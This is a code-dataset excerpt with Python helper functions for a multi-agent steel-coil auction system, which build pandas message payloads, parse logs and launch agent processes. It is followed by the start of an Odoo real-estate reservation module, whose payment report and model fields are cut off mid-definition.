= \"\"\n act_df.at[0, 'time'] = datetime.datetime.now()\n act_df.at[0, 'status'] = \"on\"\n act_df.at[0, 'activation_time'] = status_started_at\n if act_df.at[0, 'id'] == 'browser':\n act_df.drop(['location'], axis=1)\n if args:\n df = args[0]\n act_df = act_df.join(df)\n act_json = act_df.to_json(orient=\"records\")\n return act_json\n\ndef inform_log_df(agent_full_name, status_started_at, status, df, *args, **kwargs):\n \"\"\"Inform of agent status\"\"\"\n inf_df = df.loc[:, 'id':'activation_time']\n inf_df = inf_df.astype(str)\n inf_df.at[0, 'id'] = inf_df.at[0, 'id']\n inf_df.at[0, 'agent_type'] = inf_df.at[0, 'agent_type']\n inf_df.at[0, 'purpose'] = \"inform\"\n inf_df.at[0, 'request_type'] = \"\"\n inf_df.at[0, 'time'] = datetime.datetime.now()\n inf_df.at[0, 'status'] = status\n inf_df.at[0, 'activation_time'] = status_started_at\n if inf_df.at[0, 'id'] == 'browser':\n inf_df.drop(['location'], axis=1)\n if args:\n inf_df.at[0, 'to_do'] = args[0]\n inf_df.loc[0, 'plant'] = \"VA\"\n if kwargs: # in case did not enter auction\n inf_df.at[0, 'entered_auction'] = kwargs[0] # \"No, temp difference out of limit\"\n return inf_df\n\ndef op_times(p_df, ca_data_df):\n df = ca_data_df\n df.at[0, 'AVG(ca_op_time)'] = p_df['processing_time'].iloc[-1]\n df.at[0, 'AVG(tr_op_time)'] = (3 + random()) * 60 # between 3 and 4\n return df\n\ndef result(coil_ofertas_df, jid_list):\n df = pd.DataFrame([], columns=['Coil', 'Minimum_price', 'Bid', 'Difference', 'Budget_remaining'])\n for i in range(len(jid_list)):\n df.at[i, 'Coil'] = coil_ofertas_df.loc[i, 'id']\n df.at[i, 'Minimum_price'] = coil_ofertas_df.loc[i, 'minimum_price']\n df.at[i, 'Bid'] = coil_ofertas_df.loc[i, 'bid']\n df.at[i, 'Difference'] = coil_ofertas_df.loc[i, 'difference']\n df.at[i, 'Budget_remaining'] = coil_ofertas_df.loc[i, 'budget_remaining']\n return df\n\ndef results_2 (coil_contraofertas_df, jid_list):\n df = pd.DataFrame([], columns=['Coil', 'Minimum_price', 'Counterbid', 'Profit'])\n for i in range(len(jid_list)):\n df.at[i, 'Coil'] = coil_contraofertas_df.loc[i, 'id']\n df.at[i, 'Minimum_price'] = coil_contraofertas_df.loc[i, 'minimum_price']\n df.at[i, 'Counterbid'] = coil_contraofertas_df.loc[i, 'counterbid']\n df.at[i, 'Profit'] = coil_contraofertas_df.loc[i, 'profit']\n return df\n\ndef check_active_users_loc_times(va_data_df, agent_name, *args):\n \"\"\"Returns a json with va averages operation time\"\"\"\n if args == \"coils\":\n df = br_get_requested_df(agent_name, args)\n else:\n df = br_get_requested_df(agent_name)\n # Calculate means\n df['time'] = pd.to_datetime(df['time'])\n '''df['AVG(ca_op_time)'] = pd.to_datetime(df['AVG(ca_op_time)'], unit='ms')\n va_avg = df['AVG(ca_op_time)'].mean() # avg(operation_time_ca)\n if pd.isnull(va_avg):\n va_avg = 9\n else:\n va_avg = va_avg - datetime.datetime(1970, 1, 1)\n va_avg = va_avg.total_seconds() / 60\n op_times_df = pd.DataFrame([], columns=['AVG(va_op_time)'])\n op_times_df.at[0, 'AVG(va_op_time)'] = va_avg'''\n # Check active users locations\n sorted_df = df.sort_values(by=['time'])\n sorted_df = sorted_df.loc[sorted_df['agent_type'] == \"coil\"]\n sorted_df = sorted_df.drop_duplicates(subset=['id'], keep=\"last\")\n sorted_df = sorted_df.loc[sorted_df['status'] == \"auction\"]\n active_time = datetime.datetime.now() - datetime.timedelta(seconds=300)\n sorted_df = sorted_df.loc[sorted_df['time'] < active_time]\n uniques = sorted_df['id']\n uniques = uniques.drop_duplicates()\n uniques = uniques.tolist()\n values = []\n keys = []\n for i in uniques:\n a = 
sorted_df.loc[sorted_df['id'] == i]\n last_id = a.loc[a.index[-1], 'id']\n last_location = a.loc[a.index[-1], 'location']\n keys.append(last_id)\n values.append(last_location)\n users_location = dict(zip(keys, values))\n users_location_df = pd.DataFrame([users_location])\n users_location_df = users_location_df.T\n indexes = users_location_df.index.values.tolist()\n users_location_df.insert(loc=0, column='agent', value=indexes)\n users_location_df = users_location_df.rename(columns={0: \"location\"})\n users_location_df = users_location_df.reset_index(drop=True)\n for i in range(len(users_location_df['agent'])):\n slice = users_location_df.loc[i, 'agent'][:-3]\n if slice == 'coil_':\n users_location_df.at[i, 'agent_type'] = users_location_df.loc[i, 'agent'][:-4]\n elif slice == 'brow':\n users_location_df.at[i, 'agent_type'] = users_location_df.loc[i, 'agent']\n else:\n users_location_df.at[i, 'agent_type'] = users_location_df.loc[i, 'agent'][:-3]\n # Joins information\n #users_location_df = users_location_df.join(op_times_df)\n #users_location_df = users_location_df.loc[users_location_df['agent_type'] == \"coil\"]\n users_location_df = users_location_df.reset_index(drop=True)\n coil_df = pd.DataFrame()\n z = va_data_df.loc[0, 'wh_available']\n for i in z:\n row_df = users_location_df.loc[users_location_df['location'] == i]\n coil_df = coil_df.append(row_df)\n coil_df = coil_df.sort_index()\n coil_df = coil_df.reset_index(drop=True)\n coil_df = get_coil_list(coil_df, va_data_df.loc[0, 'list_coils'])\n return coil_df\n\ndef br_get_requested_df(agent_name, *args):\n \"\"\"Returns a df in which calculations can be done\"\"\"\n df = pd.DataFrame()\n if args == \"coils\":\n search_str = '{\"id\":{\"0\":\"' + \"coil\" + '_' # tiene que encontrar todas las coil que quieran fabricarse y como mucho los últimos 1000 registros.\n else:\n search_str = \"activation_time\" # takes every record with this. 
Each agent is sending that info while alive communicating to log.\n l = []\n N = 1000\n with open(r\"log.log\") as f:\n for line in f.readlines()[-N:]: # from the last 1000 lines\n if search_str in line: # find search_str\n n = line.find(\"{\")\n a = line[n:]\n l.append(a)\n df_0 = pd.DataFrame(l, columns=['register'])\n for ind in df_0.index:\n if ind == 0:\n element = df_0.loc[ind, 'register']\n for x in range(len(element)):\n element = element.replace(\"]\", \"\")\n y = json.loads(element)\n df = pd.DataFrame(y, index=[0])\n else:\n element = df_0.loc[ind, 'register']\n for x in range(len(element)):\n element = element.replace(\"]\", \"\")\n y = json.loads(element)\n b = pd.DataFrame(y, index=[0])\n df = df.append(b)\n df = df.reset_index(drop=True)\n if args == \"coils\": # if ca is requesting\n df = df.loc[0, 'to_do'] == \"search_auction\"\n return df\n\ndef req_active_users_loc_times(agent_df, seq, list, *args):\n \"\"\"Returns msg body to send to browser as a json\"\"\"\n va_request_df = agent_df #.loc[:, 'id':'time']\n va_request_df = va_request_df.astype(str)\n va_request_df.at[0, 'purpose'] = \"request\"\n this_time = datetime.datetime.now()\n va_request_df.at[0, 'time'] = this_time\n va_request_df.at[0, 'seq'] = seq\n va_request_df.loc[0, 'list_coils'] = str(list)\n if args:\n va_request_df.at[0, 'request_type'] = args[0]\n else:\n va_request_df.at[0, 'request_type'] = \"active users location & op_time\"\n return va_request_df\n\ndef req_active_users_loc_times_coil(agent_df, seq, *args):\n \"\"\"Returns msg body to send to browser as a json\"\"\"\n va_request_df = agent_df #.loc[:, 'id':'time']\n va_request_df = va_request_df.astype(str)\n va_request_df.at[0, 'purpose'] = \"request\"\n this_time = datetime.datetime.now()\n va_request_df.at[0, 'time'] = this_time\n va_request_df.at[0, 'seq'] = seq\n va_request_df.loc[0, 'list_coils'] = str(list)\n if args:\n va_request_df.at[0, 'request_type'] = args[0]\n else:\n va_request_df.at[0, 'request_type'] = \"active users location & op_time\"\n return va_request_df\n\ndef req_coil_loc(agent_df, *args):\n \"\"\"Returns msg body to send to browser as a json\"\"\"\n coil_request_df = agent_df #.loc[:, 'id':'time']\n coil_request_df = coil_request_df.astype(str)\n coil_request_df.at[0, 'purpose'] = \"request\"\n this_time = datetime.datetime.now()\n coil_request_df.at[0, 'time'] = this_time\n if args:\n coil_request_df.at[0, 'request_type'] = args[0]\n else:\n coil_request_df.at[0, 'request_type'] = \"my location\"\n return coil_request_df.to_json()\n\ndef bids_mean(medias_list):\n if len(medias_list) > 3:\n medias_list = medias_list[-3:]\n medias_list = stats.mean(medias_list)\n return medias_list\n\ndef msg_to_browser(order_body, agent_directory):\n agents_df = agents_data()\n agents_df = agents_df.loc[agents_df['Name'] == \"browser\"]\n log_jid = agents_df['User name'].iloc[-1]\n order_msg = Message(to=log_jid)\n order_msg.body = order_body\n order_msg.set_metadata(\"performative\", \"inform\")\n return order_msg\n\ndef change_warehouse(launcher_df, my_dir):\n va = launcher_df.loc[0, 'list_ware'].split(',')\n lc = launcher_df.loc[0, 'list_coils'].split(',')\n wait_time = launcher_df.loc[0, 'wait_time']\n j = 0\n my_dir = os.getcwd()\n for z in lc:\n number = 1\n name = 'coil_00' + str(number)\n df = pd.read_csv(f'agents.csv', header=0, delimiter=\",\", engine='python')\n for i in range(30):\n if df.loc[df.Name == name, 'Code'].isnull().any().any():\n cmd = f'python3 coil.py -an {str(number)} -l {va[j]} -c{z} -w{wait_time}'\n 
subprocess.Popen(cmd, stdout=None, stdin=None, stderr=None, close_fds=True, shell=True)\n break\n elif df.loc[df.Name == name, 'Code'].values == z:\n cmd = f'python3 coil.py -an {str(number)} -l {va[j]} -c{z} -w{wait_time}'\n subprocess.Popen(cmd, stdout=None, stdin=None, stderr=None, close_fds=True, shell=True)\n break\n else:\n number = number + 1\n if len(str(number)) < 2:\n name = 'coil_00' + str(number)\n else:\n name = 'coil_0' + str(number)\n time.sleep(5)\n j = j + 1\n\ndef order_file(agent_full_name, order_code, steel_grade, thickness, width_coils, num_coils, list_coils, each_coil_price,\n list_ware, string_operations, wait_time):\n order_msg_log = pd.DataFrame([], columns=['id', 'order_code', 'steel_grade', 'thickness_coils', 'width_coils',\n 'num_coils', 'list_coils', 'each_coil_price', 'string_operations',\n 'date'])\n order_msg_log.at[0, 'id'] = agent_full_name\n order_msg_log.at[0, 'purpose'] = 'setup'\n order_msg_log.at[0, 'msg'] = 'new order'\n order_msg_log.at[0, 'order_code'] = order_code\n order_msg_log.at[0, 'steel_grade'] = steel_grade\n order_msg_log.at[0, 'thickness_coils'] = thickness\n order_msg_log.at[0, 'width_coils'] = width_coils\n order_msg_log.at[0, 'num_coils'] = num_coils\n order_msg_log.at[0, 'list_coils'] = list_coils\n order_msg_log.at[0, 'each_coil_price'] = each_coil_price\n order_msg_log.at[0, 'list_ware'] = list_ware\n order_msg_log.at[0, 'string_operations'] = string_operations\n order_msg_log.at[0, 'date'] = date.today().strftime('%Y-%m-%d')\n order_msg_log.at[0, 'to'] = 'log'\n order_msg_log.at[0, 'wait_time'] = wait_time\n return order_msg_log\n\ndef order_code_log(coil_code, df, my_full_name):\n order_coil_df = pd.DataFrame([], columns=['Code'])\n order_coil_df.at[0, 'Code'] = coil_code\n order_coil_df.loc[0, 'purpose'] = \"location_coil\"\n order_coil_df.loc[0, 'id'] = my_full_name\n order_coil_df.loc[0, 'to'] = 'log@apiict00.etsii.upm.es'\n order_coil_df.loc[0, 'msg'] = df.loc[0, 'seq']\n order_coil_df = order_coil_df[['id', 'Code', 'purpose', 'msg', 'to']]\n return order_coil_df\n\ndef loc_of_coil(coil_df):\n loc_df = pd.DataFrame([], columns = ['location'])\n df = pd.read_csv('agents.csv', header=0, delimiter=\",\", engine='python')\n code = coil_df.loc[0, \"Code\"]\n location = df.loc[df.Code == code, 'location']\n location = location.values\n if location:\n location = location[0]\n loc_df.loc[0, 'location'] = location\n return loc_df\n else:\n coil_df = pd.DataFrame()\n return coil_df\n\ndef change_jid(my_dir, my_full_name):\n df = agents_data()\n df.loc[df.Name == my_full_name, 'Code'] = ''\n df.to_csv(f'{my_dir}''/''agents.csv', index=False, header=True)\n\ndef order_budget(budget, code):\n df = pd.DataFrame()\n df_agents = pd.read_csv(f'agents.csv', header=0, delimiter=\",\", engine='python')\n name = df_agents.loc[df_agents.Code == code, 'User name'].values\n name = name[0]\n df.loc[0, 'id'] = 'launcher'\n df.loc[0, 'purpose'] = 'setup'\n df.loc[0, 'msg'] = 'new budget'\n df.loc[0, 'budget'] = budget\n df.loc[0, 'code'] = str(code)\n df.loc[0, 'to'] = str(name)\n return df\n\ndef order_coil(la_json, code):\n df = pd.read_csv(f'agents.csv', header=0, delimiter=\",\", engine='python')\n name = df.loc[df.Code == code, 'User name'].values\n name = name[0]\n msg_budget = Message()\n msg_budget.to = str(name)\n msg_budget.body = la_json\n return msg_budget\n\n\n\n\n\n\n\n'''Functions to improve readability in messages. 
Improve functions'''\n\ndef request_browser(df, seq, list):\n df.loc[:, 'id':'request_type']\n df.loc[0, 'to'] = 'browser@apiict00.etsii.upm.es'\n df.loc[0, 'msg'] = seq\n df.loc[0, 'coils'] = str(list)\n df = df[['id', 'purpose', 'request_type', 'msg', 'to']]\n return df\n\ndef answer_va(df_br, sender, df_va, coils, location):\n df = pd.DataFrame()\n df.loc[0, 'msg'] = df_va.loc[0, 'seq']\n df.loc[0, \"id\"] = 'browser'\n df.loc[0, \"coils\"] = coils\n df.loc[0, \"location\"] = location\n df.loc[0, \"purpose\"] = 'answer'\n df.loc[0, \"to\"] = sender\n df = df[['id', 'purpose', 'msg', 'coils', 'location', 'to']]\n return df\n\ndef answer_coil(df, sender, seq_df):\n df.loc[0, 'msg'] = seq_df.loc[0, 'msg']\n df.loc[0, \"id\"] = 'browser'\n df.loc[0, \"purpose\"] = 'answer'\n df.loc[0, \"to\"] = sender\n df = df[['id', 'purpose', 'msg','location', 'to']]\n return df\n\ndef send_va(my_full_name, number, auction_level, jid_list):\n df = pd.DataFrame()\n df.loc[0, 'id'] = my_full_name\n df.loc[0, 'purpose'] = 'inform'\n if auction_level == 1:\n df.loc[0, 'msg'] = 'send pre-auction'\n elif auction_level == 2:\n df.loc[0, 'msg'] = 'send auction'\n elif auction_level == 3:\n df.loc[0, 'msg'] = 'send acceptance'\n df.loc[0, 'number'] = number\n df.loc[0, 'to'] = jid_list\n return df\n\ndef send_coil(my_full_name, seq):\n df = pd.DataFrame()\n df.loc[0, 'id'] = my_full_name\n df.loc[0, 'agent_type'] = 'coil'\n df.loc[0, 'purpose'] = 'request'\n df.loc[0, 'request_type'] = 'my location'\n df.loc[0, 'msg'] = seq\n df.loc[0, 'to'] = 'browser@apiict00.etsii.upm.es'\n return df\n\ndef send_br_log(df, df_br, my_full_name):\n df.loc[0, 'id'] = my_full_name\n df.loc[0, 'purpose'] = 'answer'\n df.loc[0, 'msg'] = df_br.loc[0, 'msg']\n df.loc[0, 'to'] = 'browser@apiict00.etsii.upm.es'\n df = df[['id', 'purpose', 'msg', 'location', 'to']]\n return df.to_json(orient=\"records\")\n\ndef send_to_va_msg(my_full_name, bid, to, level):\n df = pd.DataFrame()\n df.loc[0, 'id'] = my_full_name\n df.loc[0, 'agent_type'] = 'coil'\n df.loc[0, 'purpose'] = 'inform'\n if level == '1':\n df.loc[0, 'msg'] = 'send bid'\n df.loc[0, 'Bid'] = bid\n elif level == 2:\n df.loc[0, 'msg'] = 'send counterbid'\n df.loc[0, 'counterbid'] = bid\n df.loc[0, 'to'] = to\n return df\n\ndef send_activation_finish(my_full_name, ip_machine, level):\n df = pd.DataFrame()\n df.loc[0, 'id'] = my_full_name\n df.loc[0, 'purpose'] = 'inform'\n df.loc[0, 'msg'] = 'change status'\n if level == 'start':\n df.loc[0, 'status'] = 'started'\n elif level == 'end':\n df.loc[0, 'status'] = 'ended'\n df.loc[0, 'IP'] = ip_machine\n return df.to_json(orient=\"records\")\n\ndef inform_error(msg):\n df = pd.DataFrame()\n df.loc[0, 'purpose'] = 'inform error'\n df.loc[0, 'msg'] = msg\n return df.to_json(orient=\"records\")\n\ndef inform_finish(msg):\n df = pd.DataFrame()\n df.loc[0, 'purpose'] = 'inform'\n df.loc[0, 'msg'] = msg\n return df.to_json(orient=\"records\")\n\ndef won_auction(my_full_name, va_coil_msg_sender_f, this_time):\n df = pd.DataFrame()\n df.loc[0, 'id'] = my_full_name\n df.loc[0, 'purpose'] = 'inform'\n df.loc[0, 'msg'] = f'won auction in {va_coil_msg_sender_f}'\n df.loc[0, 'time'] = this_time\n return df.to_json(orient=\"records\")\n\ndef finish_va_auction(my_full_name, number):\n df = pd.DataFrame()\n df.loc[0, 'id'] = my_full_name\n df.loc[0, 'purpose'] = 'inform'\n df.loc[0, 'msg'] = f'finish auction number: {number}.'\n return df.to_json(orient=\"records\")\n\ndef order_register(my_full_name, code, coils, locations):\n df = pd.DataFrame()\n 
df.loc[0, 'id'] = my_full_name\n df.loc[0, 'purpose'] = 'inform'\n df.loc[0, 'msg'] = 'new order from launcher'\n df.loc[0, 'code'] = code\n df.loc[0, 'coils'] = coils\n df.loc[0, 'locations'] = locations\n return df.to_json(orient=\"records\")\n\ndef log_status(my_full_name, status, ip_machine):\n df = pd.DataFrame()\n df.loc[0, 'id'] = my_full_name\n df.loc[0, 'purpose'] = 'inform'\n df.loc[0, 'msg'] = 'change status'\n df.loc[0, 'status'] = status\n df.loc[0, 'IP'] = ip_machine\n return df.to_json(orient=\"records\")\n\ndef coil_status(my_full_name):\n df = pd.DataFrame()\n df.loc[0, 'id'] = my_full_name\n df.loc[0, 'purpose'] = 'inform'\n df.loc[0, 'msg'] = 'change status'\n df.loc[0, 'status'] = 'sleep'\n return df.to_json(orient=\"records\")\n\n\n\n\n\n'''funciones Monica'''\ndef order_to_search(search_body, agent_full_name, agent_directory):\n agents_df = agents_data()\n agents_df = agents_df.loc[agents_df['Name'] == \"browser\"]\n browser_jid = agents_df['User name'].iloc[-1]\n search_msg = Message(to=browser_jid)\n search_msg.body = 'Search:' + search_body + ':' + agent_full_name\n search_msg.set_metadata(\"performative\", \"inform\")\n return search_msg\n\ndef br_int_fab_df(agent_df):\n \"\"\"Returns df to send to interrupted fab coil\"\"\"\n agent_df.at[0, 'int_fab'] = 1\n return agent_df\n\ndef br_msg_to(msg_body):\n \"\"\"Returns msg object without destination\"\"\"\n msg = Message()\n msg.body = msg_body\n msg.set_metadata(\"performative\", \"inform\")\n return msg\n\ndef order_searched(filter, agent_request, agent_directory):\n agents_df = agents_data()\n agents_df = agents_df.loc[agents_df['Name'] == agent_request]\n launcher_jid = agents_df['User name'].iloc[-1]\n order_searched_msg = Message(to=launcher_jid)\n order_searched_msg.body = 'Order searched:' + filter\n order_searched_msg.set_metadata(\"performative\", \"inform\")\n return order_searched_msg\n\ndef order_to_log(order_body, agent_directory):\n agents_df = agents_data()\n agents_df = agents_df.loc[agents_df['Name'] == \"log\"]\n log_jid = agents_df['User name'].iloc[-1]\n order_msg = Message(to=log_jid)\n order_msg.body = order_body\n order_msg.set_metadata(\"performative\", \"inform\")\n return order_msg\n\ndef checkFileExistance():\n try:\n with open('ActiveAgents.csv', 'r') as f:\n return True\n except FileNotFoundError as e:\n return False\n except IOError as e:\n return False\n\ndef alive_agent(agent_jid):\n msg_alive = Message(to=agent_jid)\n msg_alive.body = \"Alive: Agent\"\n msg_alive.set_metadata(\"performative\", \"inform\")\n return msg_alive\n\ndef aa_type(id):\n t = id.split('@')\n type = t[0]\n if type[:-2] == \"l\":\n s = \"log\"\n elif type[:-2] == \"brows\":\n s = \"browser\"\n elif type[:-2] == \"ca\":\n s = \"ca\"\n elif type[:-2] == \"wh\":\n s = \"wh\"\n elif type[:-2] == \"tc\":\n s = \"tc\"\n elif type[:-2] == \"launch\":\n s = \"launcher\"\n else:\n s = \"coil\"\n return s\n\ndef checkFile2Existance():\n try:\n with open('RegisterOrders.csv', 'r') as f:\n return True\n except FileNotFoundError as e:\n return False\n except IOError as e:\n return False\n\ndef update_coil_status(coil_id, status):\n df = pd.read_csv('RegisterOrders.csv', header=0, delimiter=\",\", engine='python')\n df.loc[(df.ID_coil.isin([coil_id])), 'coil_status'] = status\n df.to_csv('RegisterOrders.csv', index=False)\n\ndef save_order(msg):\n s = msg.split(':')\n code = s[4].split('\"')\n steel = s[6].split('\"')\n thick = s[8].split('}')\n width = s[10].split('}')\n num = s[12].split('}')\n list = s[14].split('\"')\n 
id_coil = list[1].split(',')\n price = s[16].split('}')\n dat = msg.split('\"')\n string_operations = s[18].split('\"')\n status = string_operations[1].split(';')\n i = 0\n n = int(num[0])\n while (i < n):\n lista_total = []\n lista_total.append({\n 'Date': dat[51],\n 'Order_code': code[1],\n 'Steel_grade': steel[1],\n 'Thickness': thick[0],\n 'Width_coils': width[0],\n 'Number_coils': num[0],\n 'ID_coil': id_coil[i],\n 'Price_coils': price[0],\n 'Operations': string_operations[1],\n 'coil_status': status[0]\n })\n columns = ['Date', 'Order_code', 'Steel_grade', 'Thickness', 'Width_coils', 'Number_coils', 'ID_coil',\n 'Price_coils', 'Operations', 'coil_status']\n df = pd.DataFrame(lista_total, columns=columns)\n with open('RegisterOrders.csv', 'a') as f:\n if os.path.getsize('RegisterOrders.csv') == 0:\n df.to_csv(f, header=True, index=False)\n else:\n df.to_csv(f, header=False, index=False)\n i += 1\n\ndef msg_to_launcher(msg, agent_directory):\n \"\"\"Returns msg object to send to launcher agent\"\"\"\n agents_df = agents_data()\n agents_df = agents_df.loc[agents_df['Name'] == \"launcher\"]\n jid = agents_df['User name'].iloc[-1]\n msg_la = Message(to=jid)\n msg_la.body = msg\n msg_la.set_metadata(\"performative\", \"inform\")\n return msg_la\n","repo_name":"jcollado7/DynReactProject","sub_path":"assistant_functions.py","file_name":"assistant_functions.py","file_ext":"py","file_size_in_byte":47770,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"22894677476","text":"from openerp import models, fields, api, _\r\nimport datetime\r\nimport dateutil.parser\r\nfrom openerp.exceptions import ValidationError\r\nimport time\r\nfrom datetime import date\r\nfrom dateutil.relativedelta import relativedelta\r\nfrom openerp.tools import float_compare\r\n\r\n\r\nclass ReportReservationPayment(models.AbstractModel):\r\n _name = 'report.sky_height.reservation_payment_report_template'\r\n\r\n @api.multi\r\n def render_html(self, data):\r\n account_moves_lines = []\r\n account_moves = []\r\n self.model = self.env.context.get('active_model')\r\n\r\n if not data.get('ids'):\r\n data['ids'] = self.ids\r\n docs = self.env['rs.reservation'].browse(data['ids'])\r\n if docs:\r\n for doc in docs:\r\n for payment_strg in doc.payment_strg_ids:\r\n for move_line in payment_strg.payment_id.move_line_ids:\r\n account_moves_lines.append(move_line)\r\n if move_line.move_id not in account_moves:\r\n account_moves.append(move_line.move_id)\r\n\r\n updated_moves = []\r\n all_lines = []\r\n key_list = []\r\n if account_moves and len(account_moves) > 0:\r\n for x in range(0, len(account_moves)):\r\n move_from_to = str(account_moves[x].line_ids[0].account_id.id) + ' ' + \\\r\n str(account_moves[x].line_ids[1].account_id.id)\r\n updated_moves.append({'move_from_to': move_from_to, 'move': account_moves[x]})\r\n if move_from_to not in key_list:\r\n key_list.append(move_from_to)\r\n\r\n filter_updated_moves = []\r\n for key in key_list:\r\n append_list = []\r\n filter_results = filter(lambda move: move['move_from_to'] == key, updated_moves)\r\n for result in filter_results:\r\n append_list.append(result['move'])\r\n filter_updated_moves.append(append_list)\r\n\r\n debit_amount = 0\r\n credit_amount = 0\r\n partner_name = ''\r\n payment_method = ''\r\n debit_account = ''\r\n credit_account = ''\r\n updated_date = ''\r\n if filter_updated_moves and len(filter_updated_moves) > 0:\r\n for x in range(0, len(filter_updated_moves)):\r\n if filter_updated_moves[x] and 
len(filter_updated_moves[x]) > 0:\r\n for y in range(0, len(filter_updated_moves[x])):\r\n for move_line in filter_updated_moves[x][y].line_ids:\r\n partner_name = move_line.partner_id.name\r\n payment_method = move_line.journal_id.name\r\n updated_date = move_line.date\r\n if move_line.debit != 0:\r\n debit_amount += move_line.debit\r\n debit_account = move_line.account_id.name\r\n\r\n elif move_line.credit != 0:\r\n credit_amount += move_line.credit\r\n credit_account = move_line.account_id.name\r\n\r\n all_lines.append({'partner_id': partner_name, 'date': updated_date,\r\n 'journal_id': payment_method, 'account_id': debit_account,\r\n 'debit': debit_amount, 'credit': 0})\r\n\r\n all_lines.append({'partner_id': partner_name, 'date': updated_date,\r\n 'journal_id': payment_method, 'account_id': credit_account,\r\n 'debit': 0, 'credit': credit_amount})\r\n debit_amount = 0\r\n credit_amount = 0\r\n partner_name = ''\r\n payment_method = ''\r\n debit_account = ''\r\n credit_account = ''\r\n updated_date = ''\r\n\r\n docargs = {\r\n 'doc_ids': self.ids,\r\n 'doc_model': self.model,\r\n 'docs': docs,\r\n 'lines': all_lines\r\n }\r\n\r\n return self.env['report'].render('sky_height.reservation_payment_report_template', docargs)\r\n else:\r\n pass\r\n\r\n\r\nclass RsReservation(models.Model):\r\n _name = 'rs.reservation'\r\n # _inherit = ['mail.thread', 'ir.needaction_mixin']\r\n _order = 'id desc'\r\n\r\n @api.onchange('lead_id')\r\n def get_unit_ids(self):\r\n for val in self:\r\n if val.lead_id and val.lead_id.property_id:\r\n val.unit_ids = [(6, 0, [val.lead_id.property_id.id])]\r\n\r\n # Add constrain for save value in readonly condition\r\n @api.constrains('unit_ids')\r\n def _check_unit_ids(self):\r\n for val in self:\r\n # TODO Append responsible User to sales persons\r\n if val.unit_ids:\r\n for unit in val.unit_ids:\r\n val.user_ids |= unit.resp_user_id\r\n\r\n @api.onchange('unit_ids')\r\n def check_property_responsible(self):\r\n for val in self:\r\n # TODO Append responsible User to sales persons\r\n if val.unit_ids:\r\n for unit in val.unit_ids:\r\n val.user_ids |= unit.resp_user_id\r\n\r\n # Empty payment term when change units\r\n val.pay_strategy_id = False\r\n\r\n @api.multi\r\n @api.depends('unit_ids')\r\n def get_properties_prices(self):\r\n for rec in self:\r\n if rec.unit_ids:\r\n rec.property_price = sum(unit.lst_price for unit in rec.unit_ids)\r\n else:\r\n rec.property_price = 0.0\r\n\r\n @api.multi\r\n def get_group_of_logged_user(self):\r\n for obj in self:\r\n user = self.env['res.users'].browse(obj.env.uid)\r\n obj.admin_status = False if not user.has_group('sky_height.group_sky_height_admin') else True\r\n obj.sales_status = True if user.has_group('base.group_sale_salesman') or user.has_group(\r\n 'base.group_sale_salesman_all_leads') or user.has_group('base.group_sale_manager') else False\r\n\r\n @api.multi\r\n @api.onchange('customer_id')\r\n def get_partners(self):\r\n partners = []\r\n partner_obj = self.env['res.partner'].search([('customer', '=', True)])\r\n for partner in partner_obj:\r\n partners.append(partner.id)\r\n return {'domain': {'partner_ids': [('id', 'in', partners)]}}\r\n\r\n @api.model\r\n def _default_users(self):\r\n users = self.env.user\r\n active_id = self._context.get('active_id')\r\n if self._context.get('active_model') == 'res.users' and active_id:\r\n if active_id not in users.ids:\r\n users |= self.env['res.users'].browse(active_id)\r\n return users\r\n\r\n @api.constrains('user_ids')\r\n @api.onchange('user_ids')\r\n def 
get_sales_team_domain(self):\r\n team_ids = []\r\n team_obj = self.env['crm.team']\r\n teams = team_obj.search([])\r\n for user in self.user_ids:\r\n if user.sale_team_id:\r\n team_ids.append(user.sale_team_id.id)\r\n for team in teams:\r\n if team.user_id.id == user.id and team.id not in team_ids:\r\n team_ids.append(team.id)\r\n self.sales_team_ids = team_obj.search([('id', 'in', team_ids)])\r\n\r\n @api.onchange('user_ids')\r\n def get_domain_users(self):\r\n domain_users = []\r\n users = self.env['res.users'].search([])\r\n for user in users:\r\n if user.has_group('base.group_sale_salesman') or \\\r\n user.has_group('base.group_sale_salesman_all_leads') or \\\r\n user.has_group('base.group_sale_manager') or \\\r\n user.has_group('sky_height.sale_team_leader_group'):\r\n domain_users.append(user.id)\r\n return {'domain': {'user_ids': [('id', 'in', domain_users)]}}\r\n\r\n name = fields.Char(string=\"Reservation Name\")\r\n reservation_code = fields.Char(string=\"Reservation Code\", readonly=True, copy=False)\r\n conditions = fields.Text(string=\"Conditions\")\r\n project_id = fields.Many2one('project.project', _(\"Project\"), required=True, domain=[('is_kpi', '=', False)])\r\n phase_id = fields.Many2one('project.phase', _('Phase'), required=True)\r\n unit_ids = fields.Many2many('product.product', string=\"Properties\", required=True)\r\n pay_strategy_id = fields.Many2one('account.payment.term', string=\"Payment Strategy\")\r\n payment_strg_name = fields.Char(string=\"Payment Strategy\", related='pay_strategy_id.name', store=True)\r\n payment_term_discount = fields.Float(string=\"Payment Term Discount\",\r\n related=\"pay_strategy_id.payment_term_discount\", store=True, digits=(16, 6))\r\n lead_id = fields.Many2one('crm.lead', string=\"Lead\")\r\n client_accountant_id = fields.Many2one('res.users', string=\"Client Accountant\")\r\n marital_status = fields.Selection([('single', _(\"Single\")),\r\n ('married', _(\"Married\")),\r\n ('widowed', _(\"Widowed\")),\r\n ('divorced', _(\"Divorced\"))], _('Marital Status'),\r\n related='lead_id.marital_status')\r\n no_of_kids = fields.Integer(_('No. 
Of Family Member'))\r\n sales_type = fields.Selection([('direct', _(\"Direct\")), ('indirect', _(\"Indirect\")),\r\n ('individual_broker', _(\"Individual Broker\")),\r\n ('client_referral', _(\"Client Referral\")),\r\n ('employee_referral', _(\"Employee Referral\")), ('resale', _(\"Resale\")),\r\n ('upgrade', _(\"Upgrade\")), ('supplier_through_sales', _(\"Supplier Through Sales\")),\r\n ('supplier_through_company', _(\"Supplier Through Company\")), ], _('Sales Type'))\r\n\r\n source = fields.Selection([('facebook', _(\"Facebook\")), ('callcenter', _(\"Call Center\")), ('website', _(\"Website\")),\r\n ('broker', _(\"Broker\")), ('referral', _(\"Referral\")), ('ambassador', _(\"Ambassador\")),\r\n ('other', _(\"Other\")), ('self_generated', _(\"Self Generated\"))],\r\n string='Source')\r\n\r\n # related='lead_id.source'\r\n expire_date = fields.Datetime(string=\"Expiry Date\", compute='_compute_expire_dates')\r\n reservation_date = fields.Datetime(string=\"Reservation Date\")\r\n reservation_expiry_date = fields.Datetime(string=\"Reservation Expiry Date\", compute='_compute_expire_dates')\r\n expire_date_difference = fields.Integer(string='Expire Difference', compute='_compute_expire_dates',\r\n store=True)\r\n confirm_date = 